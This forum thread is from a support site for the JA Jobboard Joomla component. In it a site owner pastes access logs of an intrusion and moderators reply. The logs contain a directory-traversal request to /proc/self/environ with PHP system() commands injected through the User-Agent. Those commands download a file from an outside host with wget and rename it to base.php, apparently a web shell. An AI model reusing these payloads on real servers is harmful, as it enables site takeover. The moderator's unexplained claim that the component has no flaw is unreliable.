test
Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • kutu Friend
    #151286

    Newley i realized unusual fiels in my root folder. Their names are base.txt and n.txt
    After i asked my hosting company and i receved this log files.

    74.7.241.42 – – [13/Apr/2010:22:34:32 +0300] “GET /index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1343 “-” “jcfs<?system(“lwp-download http://lnsshop.co .kr/n.txt 2> /dev/stdout”); ?>jcfs”
    74.7.241.42 – – [13/Apr/2010:22:35:33 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1419 “-” “jcfs<?system(“id 2> /dev/stdout”); ?>jcfs”
    74.7.241.42 – – [13/Apr/2010:22:36:59 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1368 “-” “jcfs<?system(“ls n.txt 2> /dev/stdout”); ?>jcfs”
    74.7.241.42 – – [13/Apr/2010:22:36:38 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1763 “-” “jcfs<?system(“wget http://lnsshop.co.kr/n.txt 2> /dev/stdout”); ?>jcfs”
    74.7.241.42 – – [13/Apr/2010:22:36:43 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1767 “-” “jcfs<?system(“wget http://lnsshop.co.kr/n.txt 2> /dev/stdout”); ?>jcfs”

    So someone upload shell file to my root folder via jobboard then renamed n.txt file using ja jobboard? (as you see below)

    74.7.241.42 – – [13/Apr/2010:22:37:18 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1362 “-” “jcfs<?system(“mv n.txt base.php 2> /dev/stdout”); ?>jcfs”

    As a result this is enterprise paid component and how could be this kind of BUG?

    Arvind Chauhan Moderator
    #344549

    Dear kutu,

    The file n.txt is a virus and so i have unapproved the attachment. Will it be possible for you to send the complete logs you have recieved from the hosting company. That might help in assessing the situation.

    This post has been flagged to the devs.

    Arvind

    kutu Friend
    #344567

    Do you want the all day logs that uploaded txt file? I just get this logs which are related to txt file from hosting company.
    Would you describe exactly which log records?

    Anonymous Moderator
    #344648

    <em>@kutu 179797 wrote:</em><blockquote>Do you want the all day logs that uploaded txt file? I just get this logs which are related to txt file from hosting company.
    Would you describe exactly which log records?</blockquote>

    Hi Kutu,

    I would like to clarify that all the links in your log file are trying to steal account stored in server. Thus, your server should be configured to prevent outside form such an attack.

    I already checked all the links and could see that JAJobboard have no error causing gaps in helping hacker make this during running component.

    Kindly check and get back to us for any information.

Viewing 4 posts - 1 through 4 (of 4 total)

This topic contains 4 replies, has 3 voices, and was last updated by Anonymous 14 years, 7 months ago.

We moved to new unified forum. Please post all new support queries in our New Forum